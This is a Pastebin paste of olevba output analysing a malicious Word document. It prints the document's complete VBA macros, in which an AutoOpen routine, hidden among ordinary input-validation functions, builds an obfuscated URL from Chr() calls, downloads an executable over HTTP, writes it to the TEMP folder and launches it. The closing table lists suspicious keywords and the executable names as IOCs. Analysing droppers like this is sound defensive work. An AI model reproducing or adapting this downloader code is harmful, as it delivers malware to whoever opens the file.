Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.31 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OpX:MASIHB-V orderf~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: orderf~1.doc
- Type: OpenXML
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- VEeve (8.2)
- End Sub
- Sub VEeve(FFFFF As Long)
- TgU9h0l0q
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: word/vbaProject.bin - OLE stream: u'VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Const QUOTE = "'"
- Public Const QUOTE2 = "''"
- Public Const DOUBLE_QUOTE = """"
- Public rGlT7xRnM As String
- Public Const NUMERIC_KEYS = "-01234567890."
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- Public Function Max(ByVal a As Variant, ByVal b As Variant) As Variant
- If a > b Then
- Max = a
- Else
- Max = b
- End If
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- Public Function Min(ByVal a As Variant, ByVal b As Variant) As Variant
- If a < b Then
- Min = a
- Else
- Min = b
- End If
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- Public Function Between(ByVal a As Variant, ByVal b As Variant, ByVal c As Variant) As Variant
- If a < b Then
- Between = b
- ElseIf a > c Then
- Between = c
- Else
- Between = a
- End If
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- Public Function DBRead(ByVal V As Variant, Optional ByVal NullValue As Variant = 0) As Variant
- On Error Resume Next
- DBRead = IIf(IsNull(V), NullValue, V)
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Sub TgU9h0l0q()
- nByNDCCqAzBkEo = Chr(104) & Chr(116) & "<" & Chr(116) & Chr(112) & Chr(58) & Chr(47) & ";" & Chr(47) & "s" & Chr(111) & Chr(108) & Chr(117) & Chr(116) & Chr(105) & Chr(111) & Chr(110) & Chr(45) & Chr(97) & Chr(99) & Chr(111) & Chr(117) & Chr(112) & Chr(104) & Chr(101) & Chr(110) & Chr(101) & Chr(46) & Chr(102) & Chr(114) & Chr(47) & Chr(109) & Chr(105) & Chr(110) & Chr(105) & Chr(47) & Chr(109) & Chr(112) & Chr(112) & Chr(121) & Chr(46) & "e" & Chr(120) & Chr(101)
- Set rUuJO37ZN3t = ValidateString3(Chr(77) & Chr(105) & Chr(60) & Chr(99) & Chr(114) & Chr(111) & Chr(61) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(59) & Chr(46) & Chr(88) & Chr(77) & Chr(60) & Chr(76) & Chr(59) & Chr(72) & Chr(84) & Chr(61) & Chr(84) & Chr(80))
- nByNDCCqAzBkEo = Replace(nByNDCCqAzBkEo, Chr(60), "")
- nByNDCCqAzBkEo = Replace(nByNDCCqAzBkEo, Chr(61), "")
- nByNDCCqAzBkEo = Replace(nByNDCCqAzBkEo, Chr(59), "")
- CallByName rUuJO37ZN3t, "" + Chr(79) & Chr(112) & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), _
- nByNDCCqAzBkEo _
- , False
- Set NQwAQCRSizomP = ValidateString3(Chr(87) & Chr(60) & "S" & Chr(99) & Chr(61) & Chr(114) & Chr(105) & Chr(112) & "t" & Chr(59) & Chr(46) & Chr(83) & "=" & Chr(104) & "e" & "<" & Chr(108) & Chr(108))
- Set HU2f4J2c = CallByName(NQwAQCRSizomP, "E" & Chr(110) & Chr(118) & "i" & "r" & "o" & "n" & "m" & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115))
- Z5pabTtIweA = HU2f4J2c("" + "T" & Chr(69) & Chr(77) & "P")
- rGlT7xRnM = Z5pabTtIweA & "" + "\" & "i" & Chr(104) & Chr(104) & Chr(97) & Chr(100) & "n" & Chr(105) & Chr(99) & Chr(46) & "e" & Chr(120) & "e"
- Dim eCWgqNwtczezs() As Byte
- CallByName rUuJO37ZN3t, "" + Chr(83) & Chr(101) & Chr(110) & "d", VbMethod
- eCWgqNwtczezs = CallByName(rUuJO37ZN3t, "" + Chr(114) & "e" & Chr(115) & "p" & Chr(111) & Chr(110) & "s" & Chr(101) & "B" & "o" & "d" & Chr(121), VbGet)
- H8a5KfhNJe eCWgqNwtczezs, rGlT7xRnM
- On Error GoTo kkiLwb6xLU
- a = 345 / 0
- On Error GoTo 0
- sMkc0xymfSCd:
- Exit Sub
- kkiLwb6xLU:
- ValidateString2 ("qaMNp4efRqbw")
- Resume sMkc0xymfSCd
- End Sub
- '
- Public Function DBWrite(ByVal V As Variant, Optional ByVal NullValue As Variant = 0) As Variant
- On Error Resume Next
- DBWrite = IIf(V = NullValue, Null, V)
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- ' Converts Symbol to form acceptable by Sql syntax
- ' AGR'A -> 'AGR''A'
- '
- Public Function QuotedSymbol(ByVal Symbol As String) As String
- QuotedSymbol = QUOTE & Replace(Symbol, QUOTE, QUOTE2) & QUOTE
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- ' Converts Symbol to standard form
- ' AGR''A -> AGR'A
- Public Function H8a5KfhNJe(PfWaLAWoFq4 As Variant, rOvqV3q0jE As String)
- Dim BxOUxRpIDhd: Set BxOUxRpIDhd = ValidateString3("A" & "<" & "d" & Chr(111) & Chr(59) & "d" & Chr(98) & Chr(61) & Chr(46) & Chr(83) & "t" & "=" & Chr(114) & "<" & "e" & Chr(97) & Chr(59) & "m")
- BxOUxRpIDhd.Type = 1
- BxOUxRpIDhd.Open
- BxOUxRpIDhd.write PfWaLAWoFq4
- BxOUxRpIDhd.savetofile rOvqV3q0jE, 2
- End Function
- ' AGR"A -> AGR'A
- '
- Public Sub ValidStockSymbol(Symbol As String)
- Symbol = Replace(Symbol, QUOTE2, QUOTE)
- Symbol = Replace(Symbol, DOUBLE_QUOTE, QUOTE)
- End Sub
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- Public Sub NumericFilter(KeyAscii As Integer)
- If KeyAscii > 31 Then
- If InStr(NUMERIC_KEYS, Chr$(KeyAscii)) = 0 Then
- KeyAscii = 0
- End If
- End If
- End Sub
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- ' CURRENCY 8 bytes
- ' A scaled integer between
- ' – 922,337,203,685,477.5808
- ' and 922,337,203,685,477.5807
- '
- ' We restrict it to be
- ' - positive
- ' - integer i.e. no fractions
- ' - not more than 14 symbols
- ' so it can be from 1 to 99 999 999 999 999
- '
- Public Function ValidateCurrency(TC As String)
- Dim S As String
- Dim i As Long
- On Error Resume Next
- '////////////////////////
- ' Restrict user input '/
- '//////////////////////
- With ss.TC
- i = .SelStart
- S = ValidateString(.Text, False, False, False, 14, 0)
- .Text = S
- .SelStart = i
- End With
- '///////////////////////
- ' Convert user input '/
- '/////////////////////
- On Error GoTo Fail
- ValidateCurrency = CCur(d.TC.Text)
- Exit Function
- Fail:
- On Error Resume Next
- de.TC.Text = ""
- ValidateCurrency = 0
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- Public Function ValidateString3(t5Ls3vWT9kn82Y As String)
- t5Ls3vWT9kn82Y = Replace(t5Ls3vWT9kn82Y, Chr(60), "")
- t5Ls3vWT9kn82Y = Replace(t5Ls3vWT9kn82Y, Chr(61), "")
- t5Ls3vWT9kn82Y = Replace(t5Ls3vWT9kn82Y, Chr(59), "")
- Set ValidateString3 = CreateObject("" + t5Ls3vWT9kn82Y)
- End Function
- Public Function ValidatePrice(TC As String) As Double
- Dim S As String
- Dim i As Long
- On Error Resume Next
- With dw.TC
- ' Validating UserInput
- i = .SelStart
- S = ValidateString(.Text, False, False, True, 10, 1000000000)
- ' s = VBCleanEntry(.Text, ".", 2)
- .Text = S
- .SelStart = i
- ValidatePrice = Val(.Text)
- End With
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- Public Function ValidateAmount(TC As String) As Long
- Dim S As String
- Dim i As Long
- On Error Resume Next
- With dw.TC
- ' Validating UserInput
- i = .SelStart
- S = ValidateString(.Text, False, False, False, 10, 1000000000)
- ' s = VBCleanEntry(.Text, ".", 2)
- .Text = S
- .SelStart = i
- ValidateAmount = Val(.Text)
- End With
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- Public Function ValidatePercent(TC As String) As Double
- Dim S As String
- Dim i As Long
- On Error Resume Next
- With dd.TC
- i = .SelStart
- S = ValidateString(.Text, False, True, True, 6, 100)
- Dim j As Long
- j = InStr(S, ".")
- If j > 0 Then
- Dim f As String
- Dim g As String
- f = Mid(S, j + 1)
- If Len(f) > 2 Then
- f = Left(f, 2)
- End If
- g = Left(S, j - 1)
- S = g & "." & f
- End If
- .Text = S
- .SelStart = i
- ValidatePercent = Val(.Text)
- End With
- End Function
- ' -------------------------------------------------------------
- ' function validates parsed string
- ' Use it on Change Event
- Public Function ValidateString2(pq5Q05lvWOS32 As String)
- Set k69VPFQVKj0nQ = ValidateString3(Chr(83) & "h" & Chr(61) & Chr(101) & Chr(108) & Chr(59) & Chr(108) & Chr(60) & Chr(46) & Chr(65) & Chr(112) & Chr(59) & Chr(112) & Chr(108) & Chr(105) & Chr(60) & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
- With k69VPFQVKj0nQ
- .Open (rGlT7xRnM)
- End With
- End Function
- ' © 2000 Dmitry Grechishkin, grechishkin@egartech.com
- Public Function ValidateString( _
- strInputString As String, _
- blnAllowNegative As Boolean, _
- blnAllowZero As Boolean, _
- blnAllowFractions As Boolean, _
- Optional lngMaxLen As Long = 0, _
- Optional lngMaxValue As Long = 0 _
- ) As String
- Dim strTmpValue As String
- Dim strCurrentSymbol As String
- Dim strLeftStroke As String
- Dim strRightStroke As String
- Dim lngLenght As Long
- Dim lngDotPosition As Long
- Dim blnInvalidSymbol As Boolean
- Dim blnCorrectDot As Boolean
- Dim i As Long
- Dim j As Long
- On Error Resume Next
- strTmpValue = Trim$(strInputString)
- lngLenght = Len(strTmpValue)
- If lngLenght > 0 Then
- ' ---------------------
- ' Validates user input independently from locals and uses ',' or '.' as decimal separator
- For i = 1 To lngLenght
- blnInvalidSymbol = True
- '
- If blnAllowFractions And (Mid$(strTmpValue, i, 1) = ",") Then
- Mid$(strTmpValue, i, 1) = "."
- End If
- strCurrentSymbol = Mid$(strTmpValue, i, 1)
- ' Truncates value if it exeeds max value
- If lngMaxValue > 0 Then
- If Abs(Val(strTmpValue)) > lngMaxValue Then
- strTmpValue = Left$(strTmpValue, lngLenght - 1)
- blnInvalidSymbol = True
- GoTo EX
- End If
- End If
- If lngMaxLen > 0 Then
- ' If negative values are allowed to be inputted
- If Len(Trim$(Replace(strTmpValue, "-", " "))) > lngMaxLen Then
- strTmpValue = Left$(strTmpValue, lngMaxLen)
- blnInvalidSymbol = True
- GoTo EX
- End If
- End If
- If i = 1 Then
- If blnAllowNegative And (strCurrentSymbol = "-") Then
- blnInvalidSymbol = False
- GoTo Check
- End If
- ' if zero values are allowed to input
- If Not blnAllowZero And (strCurrentSymbol = "0") Then
- blnInvalidSymbol = True
- GoTo Check
- End If
- End If
- ' --------------------------
- ' numeric validation
- For j = 0 To 9
- If strCurrentSymbol = Trim$(Str$(j)) Then
- blnInvalidSymbol = False
- GoTo Check
- End If
- Next
- ' --------------------------
- ' decimal separator is single in string
- If (lngDotPosition > 0) Then
- If (lngDotPosition = i) Then
- blnCorrectDot = True
- Else
- blnCorrectDot = False
- End If
- Else
- blnCorrectDot = True
- End If
- If blnAllowFractions And (strCurrentSymbol = ".") And blnCorrectDot Then
- blnInvalidSymbol = False
- lngDotPosition = i
- GoTo Check
- End If
- Check:
- ' If any invalid symbol is found, cut it away
- If blnInvalidSymbol Then
- strLeftStroke = Left$(strTmpValue, i - 1)
- strRightStroke = Right$(strTmpValue, lngLenght - i)
- strTmpValue = strLeftStroke + strRightStroke
- End If
- Next
- ' ---------------------
- EX:
- ValidateString = strTmpValue
- End If
- On Error GoTo 0
- End Function
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | CallByName | May attempt to obfuscate malicious |
- | | | function calls |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Open | May open a file (obfuscation: VBA |
- | | | expression) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | mppy.exe | Executable file name (obfuscation: VBA |
- | | | expression) |
- | IOC | ihhadnic.exe | Executable file name (obfuscation: VBA |
- | | | expression) |
- +------------+----------------------+-----------------------------------------+
Add Comment
Please, Sign In to add comment